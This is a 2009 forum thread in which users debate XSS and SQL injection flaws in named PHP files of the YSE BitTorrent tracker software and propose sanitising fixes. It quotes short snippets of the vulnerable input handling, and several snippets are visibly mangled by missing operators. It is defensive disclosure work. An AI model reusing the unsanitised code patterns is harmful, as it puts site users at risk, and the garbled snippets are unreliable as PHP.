Bravo List

Bravo List (http://www.bvlist.com/index.php)
-   Yuna Scatari Edition (YSE) (http://www.bvlist.com/forumdisplay.php?f=22)
-   -   YSE v2.0 PRE6 (http://www.bvlist.com/showthread.php?t=2886)

Ashur 27th June 2009 16:59

YSE v2.0 PRE6
 
1 Attachment(s)
yep just went on the YSE site and found there is
YSE v2.0 (18.05.07) Pre 6 RC 0 (update 13.07.09)


Translated with GOOGLE:
Quote:

Well

FILES only for those people who have sign up for an account and those who activate your account BY MAIL!

26.04.09
Delete files + fix security forum.
Wait footprint. update - deletion of integration with the forum.

09.07.09
Fixed bug associated with ban ip and its conversion to 127.255.255.255

13.07.09
A little edit, a partial de-integration of the forum, minor edits.
maybe this is not significant but just letting you know :D

cheers

kp380lv 27th June 2009 19:15

There is still many security holes in this updated version...

Gerxx13 20th July 2009 17:26

This version is in Russian or English ? :sos:
EDIT:
In Russian ,No thanks :D

AlaminT 27th July 2009 15:05

Quote:

Originally Posted by kp380lv (Post 12733)
There is still many security holes in this updated version...

i think that you have a little bit prejudicial view ;)

HAVE you REALY checked? :) if so - post the bugs, and they will be fixed

to TS: TBDev v2.0 (18.05.07) Pre 6 RC 0 (update 13.07.09) :P

kp380lv 27th July 2009 18:16

lol
 
AlaminT

Ok you say that this version is very safe!? No you know the truth there is still holes - why you just don't fix them if you are so smart?

Holes and security vulnerabilities:

news.php
details.php
modtask.php
userdetails.php and so i can continue....also other files has holes or security vulnerabilities... I post only few file names where is the problems but however i say that there are still security problems...

AlaminT 29th July 2009 10:10

oh, details? realy?

news - you mean xss in title or returnto? :)
modtask
userdetails

i think ehat you are posting is not a holes, post, please, go on post...

kp380lv 29th July 2009 13:56

AlaminT

news.php

Code:

$body = $_POST["body"];
should be:

Code:

$body = htmlspecialchars($_POST["body"],ENT_QUOTES);
I hope you understand what about i'm talking..

AlaminT 29th July 2009 22:07

useless:

block-news.php:

Code:

format_comment($array['body'])
why?

PHP Code:

function format_comment($text$strip_html true) {

    if (
$strip_html)
        
$s htmlspecialchars_uni($s); 

so there is NO VULNERABILITY, and your "fix" will only "break" thing like "&" in text will become as "&" e.g you write "Command & Conquer 3" in the news, and it insted writes out "Command & Conquer 3"

kp380lv 30th July 2009 10:53

Are you sure?

details.php

PHP Code:

$id $_GET["id"]; 

should be:

PHP Code:

$id = (int) $_GET["id"]; 

So there is security vulnerabilities...

Or better change this to:

PHP Code:

if (!is_valid_id($_GET['id']))             stderr($tracker_lang['error'], $tracker_lang['invalid_id']);
$id = (int) $_GET["id"]; 


Bigjoos 30th July 2009 12:01

kp380lv i thought you would have picked up on this after we told you on Tbdev about the exact same stuff - The body you post about is under format_comment like said so learn to look deeper at code.

You say

0 + should be (int) ? - Again i dont agree there as they both do pretty much the same job :)

Again your pushing an issue thats going to bite you in the arse - Go back to a test code and start learning - Funny thing is all these so called exploits .. i'd like to see the people that claim theres an exploit actually craft one and do damage - 90 % of it is all talk.

BoLaMN 30th July 2009 12:38

Dont Mind Him!
 
dont mind kp380lv he will release his Nehalem and everyone will complain about bugs in that lol..

Hey AlaminT are u still working on pre7 or is it dead code to you?
would love to see if i can help at any stage.

Regards BoLaMN

kp380lv 30th July 2009 19:58

lol
 
BoLaMN

You don't know NOTHING about Nehalem...so keep your mouth...*****.

Bigjoos no offence but you ask questions like kid..in my opinion safer is better and thats all..

In simpaty.php is XSS..

PHP Code:

$type $_GET['type']; 

better..

PHP Code:

$type htmlentities($_GET['type']); 

users.php
PHP Code:

$search trim($_GET['search']); 

better should be..

PHP Code:

$search htmlentities(trim($_GET['search'])); 

XSS possibility having moderator rights...so it's NOT safe source CODE!


UPDATE:

message.php

PHP Code:

$from_is unesc($_POST['pmees']); 

should change to:

PHP Code:

$from_is mysql_real_escape_string(unesc($_POST['pmees'])); 

This also in message.php

PHP Code:

$n_pms $_POST['n_pms'];
$comment $_POST['comment']; 

Change to:

PHP Code:


$n_pms 
= (int) $_POST['n_pms'];
$comment = (string) $_POST['comment']; 

XSS + SQL injection...

AlaminT 30th July 2009 20:52

agree - 0 + ... vs (int) = nothing cos those path expousure - is shitty just talk, NOTHING serious

USERS.PHP

print("Поиск: htmlspecialchars($search)."\">\n");

YOU ARE BLIND

simpaty.php, message.php

yes, agree

kp380lv 30th July 2009 20:54

AlaminT

Lol then print vs echo also "has no difference":D

AlaminT 30th July 2009 21:18

practicaly - no difference, except print is a function and returns TRUE, and echo params like works faster than

kp380lv 30th July 2009 21:53

AlaminT - So please include theese updates into next version..

AlaminT 30th July 2009 22:12

if i will not forget...

kp380lv 10th August 2009 10:21

Also don't forget this fix in testport.php in next YSE version - There is a XSS

PHP Code:

$port $_POST["port"];
   else
      
$port $_GET['port']; 

replace with this..

PHP Code:

$port = (int)$_POST["port"];
   else
      
$port = (int)$_GET['port']; 


Moh.ElBaz 11th September 2009 17:25

That's great kp380lv

I think we can be away from disputes and to take it as a discussion to know holes and bugs and fix it.


All times are GMT +2. The time now is 16:57.

Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.